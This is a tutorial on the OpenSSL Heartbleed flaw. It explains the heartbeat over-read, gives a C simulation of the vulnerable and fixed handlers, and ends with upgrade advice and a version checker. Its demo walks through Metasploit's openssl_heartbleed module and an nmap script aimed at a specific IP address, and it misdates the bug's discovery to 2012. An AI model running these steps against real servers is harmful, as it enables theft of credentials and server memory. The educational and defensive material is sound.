How to Exploit Heartbleed using Metasploit in Kali Linux

The Heartbleed vulnerability (registered as CVE-2014-0160) is a security bug present in older versions of the OpenSSL cryptographic library. OpenSSL is a cryptographic toolkit used to implement the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols. The Heartbleed bug in OpenSSL was discovered in 2012 and publicly disclosed in 2014. This article walks through the steps used to exploit the Heartbleed vulnerability.

Around half a million web servers that were certified as secure and trusted by a certificate authority were believed to be compromised because of this vulnerability. The bug allowed attackers to read sensitive information from web servers even though those servers used a TLS-secured communication link, because the vulnerability was not in TLS itself but in OpenSSL's implementation of it.

How does it work?


To understand how the Heartbleed vulnerability works, we first need to understand how SSL/TLS works. When communicating over SSL/TLS there is a message type called a 'Heartbeat': a request message consisting of a payload together with the length of that payload, encoded as a 16-bit integer. Heartbeat requests let the two communicating computers confirm that they are still connected even when the user is not uploading or downloading anything at that moment.

Now let's say a client sends a Heartbeat request to the server saying "send me back the four-letter word 'bird'". The server receives this message in encrypted form and acknowledges the request by sending back exactly the same piece of data, i.e. 'bird'. The Heartbeat request carries information about its own length. In the malicious scenario, the client sends a request saying "send me back the word 'bird', which is 500 letters long". The server sizes its memory buffer from the reported length rather than from the data it actually received, and so sends back 500 bytes, most of which is other information present in the web server's memory. The attacker can repeat this many times to extract useful information, including login credentials.
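As an added illustration (this is example code written for this article, not code from the original post or from OpenSSL), the following C program simulates the heartbeat handling just described. It lays out a constructed block of "process memory" holding a heartbeat request for the word "bird" followed by an unrelated, constructed secret string, then runs that request through two handlers: one that trusts the 16-bit length field inside the message, and one that adds the bounds check the OpenSSL fix introduced, comparing the claimed payload length with the length of the record that actually arrived. The record layout (type, two-byte length, payload, at least 16 bytes of padding) follows RFC 6520; the secret string and the memory layout are assumptions made for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Heartbeat record layout per RFC 6520:
 *   type(1) | payload_length(2, big-endian) | payload | padding(>=16) */
#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_PADDING  16
#define MEM_SIZE    64                         /* constructed "process memory" */
#define RECORD_LEN  (1 + 2 + 4 + HB_PADDING)   /* honest record carrying "bird": 23 bytes */

typedef struct {
    uint8_t buf[3 + MEM_SIZE];
    size_t  len;
} reply_t;

/* Build a response record that echoes n bytes starting at the payload. */
static void build_response(const uint8_t *rec, uint16_t payload_len, size_t n, reply_t *out)
{
    out->buf[0] = HB_RESPONSE;
    out->buf[1] = (uint8_t)(payload_len >> 8);
    out->buf[2] = (uint8_t)(payload_len & 0xff);
    memcpy(out->buf + 3, rec + 3, n);
    out->len = 3 + n;
}

/* Vulnerable handler: trusts the length field inside the message and never
 * compares it with the length of the record actually received (rrec_len).
 * The clamp to mem_len only keeps this simulation memory-safe; the real bug
 * read straight past the record into whatever heap memory followed it. */
static int heartbeat_vulnerable(const uint8_t *rec, size_t rrec_len,
                                size_t mem_len, reply_t *out)
{
    if (rrec_len < 3 || rec[0] != HB_REQUEST) return -1;
    uint16_t payload_len = (uint16_t)((rec[1] << 8) | rec[2]);
    size_t n = payload_len;
    if (n > mem_len - 3) n = mem_len - 3;   /* simulation guard only */
    build_response(rec, payload_len, n, out);
    return 0;
}

/* Fixed handler: the two length checks mirror those added in the OpenSSL
 * patch, which discards a heartbeat whose claimed payload does not fit
 * inside the record that was received. */
static int heartbeat_fixed(const uint8_t *rec, size_t rrec_len,
                           size_t mem_len, reply_t *out)
{
    if (1 + 2 + HB_PADDING > rrec_len) return -1;         /* too short to be valid */
    if (rec[0] != HB_REQUEST) return -1;
    uint16_t payload_len = (uint16_t)((rec[1] << 8) | rec[2]);
    if (1 + 2 + (size_t)payload_len + HB_PADDING > rrec_len) return -1;  /* the missing check */
    (void)mem_len;                       /* no clamp needed: the length is proven in bounds */
    build_response(rec, payload_len, payload_len, out);
    return 0;
}

/* Lay out a heartbeat request for "bird" with the given claimed length,
 * followed by unrelated data the server happens to hold nearby.
 * Both the record and the secret are constructed. Returns bytes in use. */
static size_t build_memory(uint8_t *mem, uint16_t claimed_len)
{
    static const char secret[] = "user=admin;pass=hunter2";   /* constructed */
    size_t i = 0;
    mem[i++] = HB_REQUEST;
    mem[i++] = (uint8_t)(claimed_len >> 8);
    mem[i++] = (uint8_t)(claimed_len & 0xff);
    memcpy(mem + i, "bird", 4);                   i += 4;
    memset(mem + i, 0, HB_PADDING);               i += HB_PADDING;   /* record ends here */
    memcpy(mem + i, secret, sizeof secret - 1);   i += sizeof secret - 1;
    return i;
}

static int reply_contains(const reply_t *r, const char *needle)
{
    size_t n = strlen(needle);
    for (size_t i = 0; i + n <= r->len; i++)
        if (memcmp(r->buf + i, needle, n) == 0) return 1;
    return 0;
}

/* Run one request through a handler.
 * Returns 1 if the reply exposed the secret, 0 if not, -1 if it was rejected. */
static int run_case(int use_fixed, uint16_t claimed_len)
{
    uint8_t mem[MEM_SIZE] = {0};
    size_t mem_len = build_memory(mem, claimed_len);
    reply_t r = {{0}, 0};
    int rc = use_fixed ? heartbeat_fixed(mem, RECORD_LEN, mem_len, &r)
                       : heartbeat_vulnerable(mem, RECORD_LEN, mem_len, &r);
    if (rc != 0) return -1;
    return reply_contains(&r, "pass=hunter2");
}

int main(void)
{
    printf("vulnerable, honest 'bird' (len 4): leaked=%d\n", run_case(0, 4));
    printf("vulnerable, claimed len 500:       leaked=%d\n", run_case(0, 500));
    printf("fixed, claimed len 500:            %s\n", run_case(1, 500) < 0 ? "rejected" : "answered");
    printf("fixed, honest 'bird' (len 4):      leaked=%d\n", run_case(1, 4));
    return 0;
}
```

The point to take from the two handlers is that nothing about the request is malformed at the protocol level; the only defence is the comparison between the length the sender claims and the length the receiver actually has, which is exactly the line the patch added.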

Heartbleed Exploit Demo

In this demo I will show a simple exploit of how an attacker can compromise the server using Kali Linux.

Step01: Install Metasploit to get the latest auxiliary module for Heartbleed

#apt install metasploit-framework


Be patient, as it will take some time. I have already installed the framework here; after the installation completes you will be back at the Kali prompt.

Step02: Start the Metasploit console

#msfconsole


Step03: Search for the Heartbleed module using the built-in search feature of the Metasploit framework, and select the first auxiliary module, which I have highlighted

#search heartbleed


Step04: Load the Heartbleed module with the command

#use auxiliary/scanner/ssl/openssl_heartbleed


Step05: After loading the auxiliary module, show its info page to reveal the options that must be set for the target

#info


Step06: Set the RHOSTS parameter to the target website that is to be attacked

#set RHOSTS 86.104.176.22


Step07: To get verbose output and see what happens when I attack the target, enable verbose mode

#set VERBOSE true


Step08: Finally attack the target by typing command:

#exploit


The target system has leaked a chunk of its memory. An attacker can repeat this procedure again and again to extract useful information, because he has no control over which memory region is returned and cannot choose the content; each repetition can return different data.

There are many tools that will show whether a website is still vulnerable to the Heartbleed attack. In our case we checked for the vulnerability using the Nmap tool.

Simply type #nmap -p 443 --script ssl-heartbleed [Target's IP]

The output shows that the target system is running an old version of OpenSSL and is vulnerable to this exploit.

Heartbleed is still present on many web servers that have not been upgraded to a patched version of OpenSSL. The way to fix this vulnerability is to upgrade to the latest version of OpenSSL. The affected versions of OpenSSL are 1.0.1 through 1.0.1f; avoid using these versions.
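For checking an inventory of servers against the version range named above, here is an added C helper (example code for this article, not from the original post or from OpenSSL) that classifies an OpenSSL version string. It accepts either a bare version such as "1.0.1f" or the full banner form "OpenSSL 1.0.1f 6 Jan 2014" as printed by the openssl command; the handling of suffixes other than a single letter (for example a "-beta1" tag, which is treated as the bare release) is an assumption of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Classify an OpenSSL version string against the affected range
 * 1.0.1 through 1.0.1f (1.0.1g carried the fix).
 * Returns 1 = affected, 0 = not in the affected range, -1 = unparseable. */
int heartbleed_affected(const char *version)
{
    static const char prefix[] = "OpenSSL ";
    if (strncmp(version, prefix, sizeof prefix - 1) == 0)
        version += sizeof prefix - 1;          /* strip banner prefix */

    int major, minor, patch;
    char letter = 0;
    int n = sscanf(version, "%d.%d.%d%c", &major, &minor, &patch, &letter);
    if (n < 3) return -1;
    if (n == 4 && !isalpha((unsigned char)letter))
        letter = 0;                            /* trailing space, '-', etc.: treat as bare release (assumption) */

    if (major != 1 || minor != 0 || patch != 1) return 0;
    /* 1.0.1 itself and the letter releases a..f are affected. */
    return (letter == 0 || (letter >= 'a' && letter <= 'f')) ? 1 : 0;
}

int main(void)
{
    /* Constructed sample banners, as "openssl version" would print them. */
    const char *samples[] = {
        "OpenSSL 1.0.1f 6 Jan 2014",
        "OpenSSL 1.0.1g 7 Apr 2014",
        "OpenSSL 1.0.2",
        "0.9.8y",
        "not a version",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-28s -> %d\n", samples[i], heartbleed_affected(samples[i]));
    return 0;
}
```

A version string alone is only a first pass: distributions sometimes backport the fix without changing the version number, so a result of 1 from this check should be confirmed with a live test such as the Nmap script above, and a 0 does not excuse skipping the upgrade.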
